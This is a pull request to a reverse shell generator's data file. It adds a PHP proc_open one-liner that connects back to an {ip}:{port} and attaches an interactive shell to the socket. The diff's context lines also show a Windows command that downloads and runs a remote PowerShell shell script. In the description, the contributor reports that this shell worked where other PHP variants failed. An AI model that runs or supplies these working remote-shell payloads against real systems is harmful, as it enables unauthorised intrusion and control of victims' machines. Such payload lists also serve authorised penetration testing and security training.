### PR TITLE
Add PHP proc_open reverse shell

### DIFF
--- a/js/data.js
+++ b/js/data.js
@@ -150,6 +150,11 @@ const reverseShellCommands = withCommandType(
             "meta": ["linux", "windows", "mac"]
         },
         {
+            "name": "PHP proc_open",
+            "command": "php -r '$sock=fsockopen(\"{ip}\",{port});$proc=proc_open(\"{shell} -i\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'",
+            "meta": ["linux", "windows", "mac"]
+        },
+        {
             "name": "Windows ConPty",
             "command": "IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {ip} {port}",
             "meta": ["windows"]


### PR DESCRIPTION
Hi,
Sorry for my English, it's really not good :(
I'm using PHP proc_open reverse shell in [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](url) and this's working very well.
Some time, I using reverse shell revshells.com, PHP exec, PHP system, PHP passthru, PHP system, netcat alert connected and notthing. But I'm using PHP proc_open and worked!